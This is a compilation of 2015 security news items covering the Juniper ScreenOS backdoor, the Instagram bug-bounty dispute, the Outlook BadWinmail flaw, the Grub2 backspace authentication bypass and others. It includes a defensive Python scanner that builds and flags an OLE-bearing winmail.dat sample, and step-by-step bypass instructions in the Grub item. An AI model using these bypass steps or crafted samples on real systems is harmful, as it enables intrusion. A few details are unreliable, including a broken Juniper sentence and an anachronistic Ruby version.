Cybersecurity issues have risen to the level of top diplomats and government officials. In 2015, cybersecurity agreements were signed between Russia and China, China and the US, China and the UK. In these documents, governments not only agree to cooperate, but also accept the responsibility to refrain from any attacks on each other. At the same time, there was extensive discussion of recent changes to the Wassenaar Arrangement restricting spyware exports. A recurring theme of the year was the use of insecure email services by various political figures across the globe, including the then US Secretary of State Hillary Clinton.

All this has led to a huge surge in interest in cybersecurity issues, not only from the mass media but also from the entertainment industry. There were feature films and TV series produced, some of them starring cybersecurity experts, sometimes as themselves.

The word cybersecurity became fashionable in 2015, but this does not mean the problem has been solved. We are seeing what amounts to exponential growth in everything related to cybercrime, including increases in the number of attacks and attackers, the number of victims, defense and protection related costs, laws and agreements that regulate cybersecurity or establish new standards. For us, this is primarily about the sophistication of the attacks we detect. The confrontation is now in the active stage, with the final stage not even on the horizon.

How human error brings down an entire IT operation

19.12.2015 Security
IT services can crash completely as a result of a single human error. And so far there is no sign that anyone has managed to ensure that people stop making mistakes.

There is very little evidence that process improvements, security training or technological advances do anything to reduce human error in IT operations. If anything, the risk of technological disasters is growing despite all the efforts made in the industry.

Security breaches and IT outages are happening more and more often, and their impact keeps getting worse: the number of people at risk of being affected by each new incident is growing, because users are increasingly interconnected.

Causes of the problem

What is the common point of failure in almost every incident? Human error. People are in some way responsible for most IT disasters. This has led (alongside other technologies, of course) to increased interest in artificial intelligence (AI) tools, in the hope that they will improve security and reliability.

New technologies and methods, however, bring new risks that do not yet exist. Stephen Hawking, speaking as a physicist and cosmologist, recently remarked: “The development of full artificial intelligence could spell the end of the human race.” And the destruction of humanity, directed by artificial intelligence, would of course be the biggest IT failure of all.

Given the continuing and seemingly unstoppable chains of information security failures, however, it may be a risk worth taking.

The evidence is relentless: in just the past few months, for example, there was the gigantic breach of the Home Depot chain’s systems, in which information on 56 million payment cards leaked, and 76 million names and addresses were stolen from the financial institution JPMorgan Chase. Last year, Hold Security estimated that a Russian criminal gang called CyberVors had stolen more than 1.2 billion unique combinations of e-mail addresses and passwords from 420,000 websites and FTP servers.

And once again: even the strongest IT security protections can do nothing to protect data when someone makes a mistake. In their analysis “Security Services 2014 Cyber Security Intelligence Index”, IBM analysts found that human error was one of the causes in 95% of the cases examined.

Threats to uptime

IT outages may not cause as much of a stir as data breaches, but they can be just as devastating. Data centers may claim to offer 99.999% availability (that is, with annual downtime limited to just 5 minutes and 26 seconds), and major cloud service providers proclaim availability of at least 99.99% (meaning that an outage must not exceed 52 minutes and 56 seconds per year), but outages still occur.

The overall risks from these failing services are growing because too many critical IT services are now concentrated among a handful of cloud providers. Small human errors can easily cause big problems that affect a large number of users.

For example, Amazon reported that its recent outage was caused by a configuration change that was “executed incorrectly”. Microsoft, in turn, noted that a recent problem with its Azure platform was caused by a system update. And outages of Google Gmail, Facebook or Yahoo Mail are not exceptional either.

The Uptime Institute reports that an analysis of data on abnormal incidents over a 20-year period shows human error to be to blame for more than 70% of all data center outages. Moreover, these failures are now more expensive than in the past.

When Kroll Ontrack, a data recovery service provider, surveyed its customers about data loss, a third of respondents said the main cause was desktop and server failures, while only 14% said human error could have caused the loss. That second figure, however, is not as small as it might seem.

Jeff Pederson, data recovery business manager at Kroll, notes that 25 to 30% of his company’s revenue comes from recovering data lost as a result of human error.

A little prevention

The standard response when something goes wrong is to remind users that disaster recovery is a shared responsibility. There are, however, concrete steps that users, vendors and IT service providers can take to prevent outages and breaches.

One step is to use best practices. For example, CenturyLink, a global data center provider, recently received the Management and Operations Stamp of Approval certification from the Uptime Institute consortium for 57 of its data centers. This certification program recognizes facilities with rigorous operational management processes.

Drew Leonard, a CenturyLink vice president, said that striving for flawless operation is essential because an outage can damage a data center’s reputation for years.

Vendors are also turning to new security tools that rely on predictive analytics and machine learning to allow users to “try to intervene before obvious damage occurs”, says John McClurg, security director at Dell.

The idea is to use machine analysis of incidents while leaving interpretation to people, says Kevin Conklin, vice president of marketing and strategy at Prelert, which specializes in machine learning systems. “But people are very unpredictable,” Conklin adds.

Juniper firewalls contain spying software, manufacturer admits

18.12.2015 Surveillance
Leading network equipment manufacturer Juniper has announced that it has found spying code in some models of its firewalls. The affected products include those running the ScreenOS system, which runs on a whole range of Juniper firewalls.

“Unauthorized code was found during recent system maintenance,” announced Bob Worrall, Juniper’s CIO. He did not, however, indicate where the malicious software might have come from. Juniper has already released patches that should fix the problems.

“So far we have received no reports that these flaws have been exploited. We nevertheless recommend that our clients update their systems and install the latest patches,” Worrall adds.

During its inspection the company uncovered two critical problems. One made it possible to gain remote administrator access to a ScreenOS device via telnet or SSH. “Although the log files would show an attempt at remote access, a skilled attacker would be able to delete these records and thus remove all evidence that the device had been compromised,” Juniper writes.

The second flaw gave an attacker able to monitor VPNs (virtual private networks) the ability to decrypt those networks. VPNs are encrypted connections between a computer and other devices. They are used mainly by companies to provide secure remote access, for example for employees on the road. According to Juniper, there would be no way to determine whether this flaw had been exploited by anyone.

The first version of ScreenOS affected by the flaws was released in September 2012. Attackers could thus have had access to corporate VPNs for quite a long time. These firewalls are a popular target for hackers because corporate appliances often carry all the information flowing into and out of a company.

This case of tampering with a major manufacturer’s software is reminiscent of the operations of the US National Security Agency (NSA), whose spying activities were partly revealed in 2013 by its former employee Edward Snowden.

In December 2013 the German magazine Der Spiegel then published a fifty-page catalog of all the hardware and software the NSA used to infiltrate American devices. These included Juniper systems, but also those of companies such as Cisco or Huawei.

Shocking! Instagram HACKED! Researcher hacked into Instagram Server and Admin Panel
Ever wonder how to hack Instagram or how to hack a facebook account? Well, someone just did it!
But, remember, even responsibly reporting a security vulnerability could end up in taking legal actions against you.
An independent security researcher claims he was threatened by Facebook after he responsibly revealed a series of security vulnerabilities and configuration flaws that allowed him to successfully gain access to sensitive data stored on Instagram servers, including:
Source Code of Instagram website
SSL Certificates and Private Keys for Instagram
Keys used to sign authentication cookies
Personal details of Instagram Users and Employees
Email server credentials
Keys for over a half-dozen critical other functions
However, instead of paying him a reward, Facebook has threatened to sue the researcher for intentionally withholding flaws and information from its team.
Wesley Weinberg, a senior security researcher at Synack, participated in Facebook's bug bounty program and started analyzing Instagram systems after one of his friends hinted him to a potentially vulnerable server located at
The researcher found an RCE (Remote Code Execution) bug in the way it processed users’ session cookies that are generally used to remember users' log-in details.
Remote code execution bug was possible due to two weaknesses:
The Sensu-Admin web app running on the server contained a hard-coded Ruby secret token
The host running a version of Ruby (3.x) that was susceptible to code execution via the Ruby session cookie
Exploiting the vulnerability, Weinberg was able to force the server to vomit up a database containing login details, including credentials, of Instagram and Facebook employees.
Although the passwords were hashed with ‘bcrypt’, Weinberg was able to crack a dozen passwords that had been very weak (like changeme, instagram, password) in just a few minutes.
Exposed EVERYTHING including Your Selfies
Weinberg did not stop here. He took a close look at other configuration files he found on the server and discovered that one of the files contained some keys for Amazon Web Services accounts, the cloud computing service used to host Instagram's Sensu setup.
These keys listed 82 Amazon S3 buckets (storage units), but these buckets were unique. He found nothing sensitive in the latest file in that bucket, but when he looked at the older version of the file, he found another key pair that let him read the contents of all 82 buckets.
Weinberg had inadvertently stumbled upon almost EVERYTHING including:
Instagram's source code
SSL certificates and private keys (including for and *
API keys that are used for interacting with other services
Images uploaded by Instagram users
Static content from the website
Email server credentials
iOS/Android app signing keys
Other sensitive data
"To say that I had gained access to basically all of Instagram's secret key material would probably be a fair statement," Weinberg wrote in his blog. "With the keys I obtained, I could now easily impersonate Instagram, or any valid user or staff member. While out of scope, I would have easily been able to gain full access to any user’s account, [personal] pictures and data."
Responsible Disclosure, but Facebook Threatens Lawsuit
Weinberg reported his findings to Facebook's security team, but the social media giant was concerned he had accessed private data of its users and employees while uncovering the issues.
Instead of receiving a reward from Facebook for his hard work, Weinberg was disqualified from the bug bounty program by Facebook.
In early December, Weinberg claims, his boss, Synack CEO Jay Kaplan, received a scary call from Facebook security chief Alex Stamos regarding the weaknesses Weinberg discovered in Instagram that left Instagram and Facebook users wide open to a devastating attack.
Stamos "stated that he did not want to have to get Facebook's legal team involved, but that he was not sure if this was something he needed to go to law enforcement over," Weinberg wrote in his blog in a section entitled 'Threats and Intimidation.'
In response, Stamos issued a statement, saying he "did not threaten legal action against Synack or [Weinberg] nor did [he] ask for [Weinberg] to be fired."
Stamos said he only told Kaplan to "keep this out of the hands of the lawyers on both sides."
"Condoning researchers going well above and beyond what is necessary to find and fix critical issues would create a precedent that could be used by those aiming to violate the privacy of our users, and such behavior by legitimate security researchers puts the future of paid bug bounties at risk," Stamos added.
Facebook Responds
After the original publication by the researcher, Facebook issued its response, saying the claims are false and that Weinberg was never told not to publish his findings, rather only asked not to disclose the non-public information he accessed.
The social media giant confirmed the existence of the remote code execution bug in the domain and promised a bug bounty of $2,500 as a reward to Weinberg and his friend who initially hinted that the server was openly accessible.
However, the other vulnerabilities that allowed Weinberg to gain access to sensitive data were not qualified, with Facebook saying he violated user privacy while accessing the data.
Here's the full statement by Facebook:
We are strong advocates of the security researcher community and have built positive relationships with thousands of people through our bug bounty program. These interactions must include trust, however, and that includes reporting the details of bugs that are found and not using them to access private information in an unauthorized manner. In this case, the researcher intentionally withheld bugs and information from our team and went far beyond the guidelines of our program to pull private, non-user data from internal systems.
We paid him for his initial bug report based on the quality, even though he was not the first to report it, but we didn't pay for the subsequent information that he had withheld. At no point did we say he could not publish his findings — we asked that he refrain from disclosing the non-public information he accessed in violation of our program guidelines. We remain firmly committed to paying for high quality research and helping the community learn from researchers' hard work.

Juniper Firewalls with ScreenOS Backdoored Since 2012
Juniper Networks has announced that it has discovered "unauthorized code" in ScreenOS, the operating system for its NetScreen firewalls, that could allow an attacker to decrypt traffic sent through Virtual Private Networks (VPNs).
It's not clear what caused the code to get there or how long it has been there, but the release notes posted by Juniper suggest the earliest buggy versions of the software date back to at least 2012 and possibly earlier.
The backdoor impacts NetScreen firewalls using ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20, states the advisory published by the company. However, there is no evidence right now as to whether the backdoor was present in other Juniper OSes or devices.
The issue was uncovered during an internal code review of the software, according to Juniper chief information officer Bob Worrall, and requires immediate patching by upgrading to a new version of the software just released today.
"Juniper discovered unauthorized code in ScreenOS that could allow a knowledgeable attacker to gain administrative access to NetScreen devices and to decrypt VPN connections," Worrall said.
How Does the Backdoor Occur?
The backdoor occurred due to a pair of critical vulnerabilities:
First allows anyone to decrypt VPN traffic and leave no trace of their actions
Second allows anyone to completely compromise a device via an unauthorized remote access vulnerability over SSH or telnet.
In short, an attacker could remotely log in to the firewall with administrator privileges, decrypt and spy on thought-to-be-secure traffic, and then even remove every trace of their activity.
Sounds awful, although Juniper claims the company has not heard of any exploitation in the wild so far and has released patched versions of ScreenOS that are available now on its download page.

Unauthorized code found in Juniper’s firewall OS

An operating system running on firewalls sold by Juniper Networks contains unauthorized code that could be exploited to decrypt traffic sent through virtual private networks.
An “unauthorized code” was discovered in the operating system for Juniper NetScreen firewalls. The company admitted the presence of the “unauthorized code” that could allow an attacker to decrypt VPN traffic.

[“unauthorized code”] “could allow a knowledgeable attacker to gain administrative access to NetScreen devices and to decrypt VPN connections.”

According to The Register, the presence of the unauthorized code could date back to 2008; the experts referred to a 2008 notice issued by Juniper about a security issue that impacts ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20. ScreenOS 6.2 was released. ScreenOS 6.3 was presented in 2009.

“During a recent internal code review, Juniper discovered unauthorized code in ScreenOS that could allow a knowledgeable attacker to gain administrative access to NetScreen devices and to decrypt VPN connections,” Juniper Chief Information Officer Bob Worrall wrote. “Once we identified these vulnerabilities, we launched an investigation into the matter, and worked to develop and issue patched releases for the latest versions of ScreenOS,” states the advisory.

The experts explained that there are several releases with numerous versions of the Juniper products and the unauthorized code was only found in some of them.


A separate advisory issued by the company confirms the presence of two separate vulnerabilities in its products. The first one allows unauthorized remote administrative access to an affected device over SSH or telnet. “The second issue may allow a knowledgeable attacker who can monitor VPN traffic to decrypt that traffic,” the advisory said. “It is independent of the first issue. There is no way to detect that this vulnerability was exploited.”

The presence of unauthorized code is disconcerting: one of the most important vendors of security appliances shipped unauthorized code in a number of its products.

Given the nature of the code, it is difficult to believe that it was accidentally “inserted” into the OS; it is likely that it was used to monitor customers’ confidential communications.

Users are urged to update their products; Juniper has issued an out-of-band patch to fix the issue.

Microsoft Outlook flaw opens the door to “mailbomb” attacks

Microsoft fixed a vulnerability in Microsoft Outlook that could allow remote code execution if the victim opens a specially crafted Office doc.
Microsoft recently fixed a number of critical bugs with the last “Patch Tuesday” issued on December 8, including an update to the Microsoft Office suite to fix a number of security issues. One of the flaws, the CVE-2015-6172 vulnerability, could be exploited by attackers for remote code execution through a “specially crafted Microsoft Office file”.

“This security update resolves vulnerabilities in Microsoft Office. The most severe of the vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Office file. An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.” states the Microsoft Security Bulletin.

The vulnerability affects Office 2010 and later, as well as Microsoft Word 2007 with Service Pack 3.

As explained by the security researcher Haifei Li in a paper entitled “BadWinmail: The ‘Enterprise Killer’ Attack Vector in Microsoft Outlook,” an attacker can exploit the vulnerability by sending a crafted attachment via e-mail, bypassing Outlook’s layers of security by abusing Office’s Object Linking and Embedding (OLE) capabilities and Outlook’s Transport Neutral Encapsulation Format (TNEF).

The winmail.dat file includes instructions on how Microsoft Office handles attachments. Before the patch was released, OLE objects were rendered within the e-mail and could call code from the application they are based on, escaping the Outlook security “sandbox.”

“When the value of the ‘PidTagAttachMethod’ [within winmail.dat] is set to ATTACH_OLE (6),” Haifei wrote, “the ‘attachment file’ (which is another file contained in the winmail.dat file) will be rendered as an OLE object.”

As a result, an attacker could create a specific TNEF e-mail and send it to the targeted user to launch the attack.

“Such a feature could allow us to ‘build’ a TNEF email and send it to the user; when the user reads the email, the embedded OLE object will be loaded automatically,” states the expert. “According to the author’s tests, various OLE objects can be loaded via emails; this poses a big security problem.”


Phishing attacks that rely on this technique are very dangerous because to compromise the victim machine, it is sufficient that the malicious message is viewed by the user.

“By packing a Flash exploit in an OLE enabled TNEF e-mail, an attacker can [achieve] full code execution as long as the victim reads the e-mail,” he reported. “We use Flash OLE object as an example since Flash (zero-day) exploits are easy to obtain by attackers, but please note that there are other OLE objects [that] may be abused by [an] attacker.”

Haifei noted that the vulnerability could also be triggered by the content of the email instead of the attachment, because Outlook automatically considers .msg files as “safe” and opens them in an Outlook message view rather than sandboxing them. This means that OLE content embedded in the body of the email will be opened automatically.

Don’t waste time, apply the patch and turn off the message preview pane in Microsoft Outlook.

Haifei also suggested setting a registry key with an “Office kill-bit” to block Flash content from automatically opening via OLE, by blocking the CLSID D27CDB6E-AE6D-11cf-96B8-444553540000:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
"Compatibility Flags"=dword:00000400

This setting will protect you from OLE-embedded Flash exploits.
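As an added example (not code from Haifei Li’s paper or from Microsoft), here is a small defender-side scanner for the TNEF (winmail.dat) attribute the article describes: it walks the TNEF attribute stream, decodes the attachment’s MAPI properties, and flags any attachment whose PidTagAttachMethod is ATTACH_OLE (6), which is the setting that makes Outlook render the embedded file as an OLE object. The two winmail.dat samples are constructed inline by the encoder helpers so the script runs offline; the attribute tags and the MAPI fixed-length encoding follow the public TNEF format, and the decoder deliberately handles only fixed-size property types.

```python
"""Flag winmail.dat (TNEF) attachments whose PidTagAttachMethod is ATTACH_OLE (6).

Constructed example for this page, not the BadWinmail paper's code. The sample
TNEF streams are built inline by the encoder helpers below, so it runs offline.
"""
import struct

TNEF_SIGNATURE = 0x223E9F78           # first 4 bytes of every TNEF stream
LVL_MESSAGE, LVL_ATTACHMENT = 1, 2    # attribute levels
ATT_TNEF_VERSION = 0x00089006         # attTnefVersion (atpDword)
ATT_ATTACH_REND_DATA = 0x00069002     # attAttachRendData: starts an attachment
ATT_ATTACHMENT = 0x00069005           # attAttachment: MAPI props of the attachment
ATT_ATTACH_DATA = 0x0006800F          # attAttachData: the attachment bytes
PR_ATTACH_METHOD = 0x37050003         # PidTagAttachMethod (0x3705) as PT_LONG (0x0003)
ATTACH_BY_VALUE, ATTACH_OLE = 1, 6
FIXED_DWORD_TYPES = {0x0002, 0x0003, 0x000B}  # PT_I2, PT_LONG, PT_BOOLEAN: 4 bytes each


def _checksum(data: bytes) -> int:
    """TNEF attribute checksum: byte sum modulo 65536."""
    return sum(data) & 0xFFFF


def encode_attribute(level: int, tag: int, data: bytes) -> bytes:
    """One TNEF attribute: level byte, tag, length, data, 16-bit checksum."""
    header = struct.pack("<BII", level, tag, len(data))
    return header + data + struct.pack("<H", _checksum(data))


def encode_mapi_long_props(props: dict) -> bytes:
    """Encode {prop_tag: int} PT_LONG properties as a TNEF MAPI property block."""
    out = struct.pack("<I", len(props))
    for tag, value in props.items():
        out += struct.pack("<Ii", tag, value)
    return out


def build_winmail(attach_method: int, payload: bytes) -> bytes:
    """Build a minimal winmail.dat with one attachment using the given attach method."""
    stream = struct.pack("<IH", TNEF_SIGNATURE, 0x1234)      # signature + arbitrary key
    stream += encode_attribute(LVL_MESSAGE, ATT_TNEF_VERSION, struct.pack("<I", 0x00010000))
    rend = struct.pack("<HIHHI", 1, 0, 32, 32, 0)            # atFile, position 0, 32x32, no flags
    stream += encode_attribute(LVL_ATTACHMENT, ATT_ATTACH_REND_DATA, rend)
    stream += encode_attribute(LVL_ATTACHMENT, ATT_ATTACH_DATA, payload)
    stream += encode_attribute(LVL_ATTACHMENT, ATT_ATTACHMENT,
                               encode_mapi_long_props({PR_ATTACH_METHOD: attach_method}))
    return stream


def parse_tnef(stream: bytes):
    """Yield (level, tag, data) per attribute; raise ValueError on a malformed stream."""
    if len(stream) < 6 or struct.unpack_from("<I", stream, 0)[0] != TNEF_SIGNATURE:
        raise ValueError("not a TNEF stream")
    pos = 6  # skip signature and key
    while pos < len(stream):
        if pos + 9 > len(stream):
            raise ValueError("truncated attribute header")
        level, tag, length = struct.unpack_from("<BII", stream, pos)
        pos += 9
        if pos + length + 2 > len(stream):
            raise ValueError("truncated attribute")
        data = stream[pos:pos + length]
        pos += length
        chk, = struct.unpack_from("<H", stream, pos)
        pos += 2
        if chk != _checksum(data):
            raise ValueError("bad attribute checksum")
        yield level, tag, data


def mapi_fixed_props(block: bytes) -> dict:
    """Decode fixed-size (4-byte) MAPI properties; stop at the first other kind."""
    count, = struct.unpack_from("<I", block, 0)
    pos, props = 4, {}
    for _ in range(count):
        if pos + 8 > len(block):
            break
        tag, = struct.unpack_from("<I", block, pos)
        # Variable-length or named (id >= 0x8000) properties carry extra data we do not decode.
        if (tag & 0xFFFF) not in FIXED_DWORD_TYPES or (tag >> 16) >= 0x8000:
            break
        value, = struct.unpack_from("<i", block, pos + 4)
        props[tag] = value
        pos += 8
    return props


def attach_methods(stream: bytes) -> list:
    """Return the PidTagAttachMethod of each attachment in the stream (None if absent)."""
    return [mapi_fixed_props(data).get(PR_ATTACH_METHOD)
            for level, tag, data in parse_tnef(stream)
            if level == LVL_ATTACHMENT and tag == ATT_ATTACHMENT]


def has_ole_attachment(stream: bytes) -> bool:
    """True if any attachment would be rendered as an OLE object (the BadWinmail condition)."""
    return ATTACH_OLE in attach_methods(stream)


def is_well_formed(stream: bytes) -> bool:
    """True if every attribute parses and its checksum matches."""
    try:
        list(parse_tnef(stream))
        return True
    except ValueError:
        return False


# Constructed samples: a normal by-value attachment and a BadWinmail-style OLE attachment.
BENIGN_WINMAIL = build_winmail(ATTACH_BY_VALUE, b"hello, this is a plain text attachment")
OLE_WINMAIL = build_winmail(ATTACH_OLE, b"\xd0\xcf\x11\xe0" + b"\x00" * 28)  # OLE compound-file magic

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_WINMAIL), ("ole", OLE_WINMAIL)):
        verdict = "QUARANTINE" if has_ole_attachment(blob) else "pass"
        print(f"{name}: attach methods {attach_methods(blob)} -> {verdict}")
```

A mail gateway can apply has_ole_attachment to every winmail.dat it sees and quarantine matches until the patch is deployed.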

Hackers trace ISIS Twitter accounts back to the UK govt

A group of hackers known as VandaSec claims three ISIS Twitter accounts trace back to computers belonging to the UK government.
According to the revelation of a group of hackers known as VandaSec, at least three Islamic State Twitter social media accounts are run from IP addresses linked to the British government’s Department for Work and Pensions (DWP).
VandaSec has discovered the internet protocol (IP) addresses used by three jihadists to access Twitter accounts involved in the activities of propaganda and online recruitment.
According to the Daily Mirror, the IP addresses belong to the DWP’s London offices.

“Hackers have claimed that a number of Islamic State supporters’ social media accounts are being run from internet addresses linked to the Department of Work and Pensions. A group of four young computer experts who call themselves VandaSec have unearthed evidence indicating that at least three ISIS-supporting accounts can be traced back to the DWP.”

“Don’t you think that’s strange?” said one of the hackers to the Daily Mirror. “We traced these accounts back to London, the home of the British intelligence services,” they added.


There are two hypotheses on the strange discovery:
There are ISIS Sympathizers inside the British government.
The accounts are used by British intelligence to identify wannabe terrorists and other members of the organization.
The addresses were thought to be based in Saudi Arabia; in reality, the Cabinet Office admitted to selling IP addresses to two Saudi companies earlier this year, which is why the IPs appear to be linked to the British Government.

“The government owns millions of unused IP addresses which we are selling to get a good return for hardworking taxpayers,” a Cabinet Office spokesperson said. “We have sold a number of these addresses to telecoms companies, both in the UK and internationally, to allow their customers to connect to the internet.” “We think carefully about which companies we sell addresses to, but how their customers use this internet connection is beyond our control.”

A secret cellphone spying devices catalog leaked online

Someone in the Intelligence community leaked online a secret catalog of cellphone spying devices used by law enforcement.
The Intercept has leaked online a secret catalog of cellphone spying devices; the valuable document was given to the online publication by someone inside the intelligence community.

The person who passed the document to The Intercept declared to be concerned about the growing militarization of domestic law enforcement.

“The Intercept obtained the catalogue from a source within the intelligence community concerned about the militarization of domestic law enforcement. (The original is here.)” states the post published on the Intercept.

“A few of the devices can house a “target list” of as many as 10,000 unique phone identifiers. Most can be used to geolocate people, but the documents indicate that some have more advanced capabilities, like eavesdropping on calls and spying on SMS messages. Two systems, apparently designed for use on captured phones, are touted as having the ability to extract media files, address books, and notes, and one can retrieve deleted text messages.”


The catalog includes 53 cellphone spying devices, including Stingray I/II surveillance boxes and Boeing “dirt boxes.”

There are some devices small enough to fit in a backpack such as the REBUS Ground Based Geo-Location that “provides limited capability to isolate targets utilizing Firewall option.”

The document also includes many other cellphone spying devices that are less well known than the Stingray and could be used by law enforcement and intelligence agencies in various scenarios, including deployment on drones and aircraft.

One of the spying devices is sold by the NSA, while another was designed for use by the CIA.

These systems have long been debated because they allow authorities to conduct dragnet surveillance; cellphone spying devices have been used by local law enforcement agencies across the United States for a long time.

“The archetypical cell-site simulator, the Stingray, was trademarked by Harris Corp. in 2003 and initially used by the military, intelligence agencies, and federal law enforcement.” continues the post. “Another company, Digital Receiver Technology, now owned by Boeing, developed dirt boxes — more powerful cell-site simulators — which gained favor among the NSA, CIA, and U.S. military as good tools for hunting down suspected terrorists. The devices can reportedly track more than 200 phones over a wider range than the Stingray.”

The Intercept also reported the case of Marc Raimondi, who was employed by Harris and is now a Department of Justice spokesman who claims the agency’s use of Stingray cellphone spying devices is legal.

Jennifer Lynch, a senior staff attorney at the Electronic Frontier Foundation, has repeatedly expressed her disappointment at the use of these devices in a domestic context.

“We’ve seen a trend in the years since 9/11 to bring sophisticated surveillance technologies that were originally designed for military use—like Stingrays or drones or biometrics—back home to the United States,” said Jennifer Lynch. “But using these technologies for domestic law enforcement purposes raises a host of issues that are different from a military context.”

I suggest you take a look at the document; it is full of interesting things.

Sophos improves endpoint protection through an acquisition

18.12.2015 Protection
Sophos has announced the acquisition of the Dutch company SurfRight, which focuses on detecting and remediating endpoint threats and on preventing advanced threats.

SurfRight has developed a portfolio of technologies that prevent, detect and remediate targeted threats and attacks exploiting vulnerabilities that have not yet been disclosed (so-called zero-day attacks). It does this by disrupting the attack vectors of malware and advanced persistent threats (APTs).

The portfolio also includes a technology that fights exploits in real time by detecting and preventing manipulation of working memory, thereby blocking exploits that would lead to the initial execution of malware.

Sophos says it will begin integrating the SurfRight technologies into its endpoint protection solutions immediately.

According to the company, SurfRight's technologies will increase the effectiveness of synchronized security, in which several components such as network and endpoint protection are used together with active, continuous communication between each of them. This enables faster threat detection and significantly reduces the time and resources needed to investigate and resolve security incidents.

You can Hack into a Linux Computer just by pressing 'Backspace' 28 times
So what would anyone need to bypass password protection on your computer?
They just need to hit the backspace key 28 times, at least on a computer running the Linux operating system.
Wait, what?
A pair of security researchers from the University of Valencia have uncovered a bizarre bug in several distributions of Linux that could allow anyone to bypass any kind of authentication during boot-up just by pressing the backspace key 28 times.
This time, the issue is neither in the kernel nor in the operating system itself; rather, the vulnerability resides in Grub2, the popular Grand Unified Bootloader, which is used by most Linux systems to boot the operating system when the PC starts.
The source of the vulnerability is nothing but an integer underflow fault that was introduced with a single commit in Grub version 1.98 (December 2009) – b391bdb2f2c5ccf29da66cecdbfb7566656a704d – affecting the grub_password_get() function.
Here's How to Exploit the Linux Vulnerability
If your computer system is vulnerable to this bug:
Just hit the backspace key 28 times at the Grub username prompt during power-up. This will open a "Grub rescue shell" under Grub2 versions 1.98 to 2.02.
This rescue shell allows unauthenticated access to a computer and the ability to load another environment.
From this shell, an attacker could gain access to all the data on your computer, and can misuse it to steal or delete all the data, or install persistent malware or rootkit, according to researchers Ismael Ripoll and Hector Marco, who published their research on Tuesday.
Here's How to Protect Linux System
The Grub vulnerability affects Linux systems from December 2009 to the present date, though older Linux systems may also be affected.
The good news is the researchers have made an emergency patch to fix the Grub2 vulnerability. So if you are a Linux user and worried your system might be vulnerable, you can apply this emergency patch, available here.
Meanwhile, many major distributions, including Ubuntu, Red Hat, and Debian have also released emergency patches to fix the issue.
Linux is often thought to be a super secure operating system compared to others, and this Grub vulnerability is a good reminder that it's high time to take physical security just as seriously as network security.

Bad Santa! Microsoft Offers — 'Upgrade now' or 'Upgrade tonight' to Push Windows 10
Many Windows 7 and Windows 8.1 users don't want to upgrade their machines to Microsoft’s newest Windows 10 operating system now or anytime soon. Isn't it?
But what if you wake up in the morning and find yourself a Windows 10 user?
That's exactly what Microsoft is doing to Windows 7 and 8.1 users.
Windows 10 Upgrade Becomes More Aggressive
Ever since Microsoft launched its new operating system over the summer, Windows 7 and 8.1 users have been pushed a number of times to upgrade their machines to Windows 10.
It was relatively inoffensive at first, but as the days have passed, Microsoft has become increasingly aggressive in pushing Windows users to upgrade to Windows 10.
Microsoft has left users very little choice over whether to upgrade their systems to Windows 10 or not. In the end, users end up upgrading their machines to the latest Windows operating system.
Users now see a pop up on their computers, as InfoWorld reports, that displays only two choices for you:
Upgrade Now 'OR' Upgrade Tonight
But, What's the Catch?
Yes, there is a way to get rid of the Windows 10 upgrade, temporarily at least.
What users will see is the above two options but what they'll not see is the third option hiding in plain sight: The 'X' button in the top-right corner of the upgrade window.
While you can click the 'X' button to make the upgrade go away, less knowledgeable users would end up upgrading to Windows 10 either then and there or that night.
Moreover, since the dialog box warns that "Upgrading to Windows 10 is Free for a Limited Time", some users could conclude that if they close the pop-up window, they may not be able to upgrade their machines for free at a later date.
Microsoft silently started pushing Windows 10 installation files to PCs running Windows 7 or Windows 8.1 about a month after its launch, even if users had not opted into the upgrade.
Almost two months ago, some Windows 7 and 8.1 users also claimed that Windows 10 had begun to install itself automatically on their PCs, which Microsoft later called a mistake.
Although there is no way to predict what tweaks Microsoft has planned for future upgrades, next time you may get a pop-up window with a single button that says "Upgrade Now."

19-Year-Old Teen Steals $150,000 by Hacking into Airline's Website
What do you do to earn up to $150,000?
Somebody just hacks into airlines and sells fake tickets.
That's exactly what a 19-year-old teenager did and made approximately 1.1 Million Yuan (£110,000 or $150,000) by hacking into the official website of an airline and using the stolen booking information to defraud hundreds of passengers.
The teenager, identified as Zhang from Heilongjiang, north-east China, hacked into a Chinese airline website and illegally downloaded 1.6 million passengers' booking details, including:
Flight details
ID card numbers
Email addresses
Mobile phone numbers
Zhang then used this information to successfully defraud hundreds of customers by convincing them that there was an issue with their flight bookings and that they had to pay extra fees, according to People's Daily Online.
Moreover, the hack caused the airline to lose almost 80,000 Yuan ($12,365 USD) as a result of customers requesting refunds.
The incident took place from 31 July to 20 August this year, and the suspect was arrested by the police in November in Dalian, north China.
A police officer said the hack was not highly sophisticated and was a result of a loophole in the airline's computer system. However, the name of the airline is not yet disclosed.

Phantom Squad wants to take down Playstation network and Xbox Live on Christmas

Playstation network and Xbox Live risk being taken down on Christmas by an anonymous group of hackers known as the Phantom Squad.
If you remember, last Christmas both the PlayStation network and Xbox Live were taken down by hackers belonging to the group known as Lizard Squad. It looks like this year the new tradition may continue, all because a group posted on Twitter a message announcing its intention to take down both the PlayStation network and Xbox Live again, threatening to keep the services down for a week.

“We are going to shut down Xbox live and PSN this year on christmas. And we are going to keep them down for one week straight #DramaAlert”

Phantom Squad (@PhantomSqaud) December 9, 2015

We have no information on the group, but it probably wants to gain popularity, and these targets at Christmas represent a great opportunity.

If they succeed, they will get the attention they want.

The intent of the Phantom Squad is to demonstrate that “cyber security does not exist” in both gaming platforms.

Phantom Squad also said that both platforms are vulnerable to attacks, and added that they were able to take down Xbox Live during the weekend:


Microsoft hasn’t confirmed the attack, but it confirmed that issues occurred in the Xbox live network on Saturday afternoon:

“We are currently investigating issues w/ signing in, managing friends, & matchmaking. Updates here while we work:,” said Microsoft’s XBox Support Twitter account.

As mentioned before, last Christmas both platforms faced the same issue: the group Lizard Squad hit both networks with a powerful DDoS attack, and the services provided by Sony and Microsoft were paralyzed for several days. After the attacks, an 18-year-old was arrested in the UK on January 16th, along with 22-year-old Vincent Omari, who was accused of being a member of the Lizard Squad group but always denied it and was released on bail.

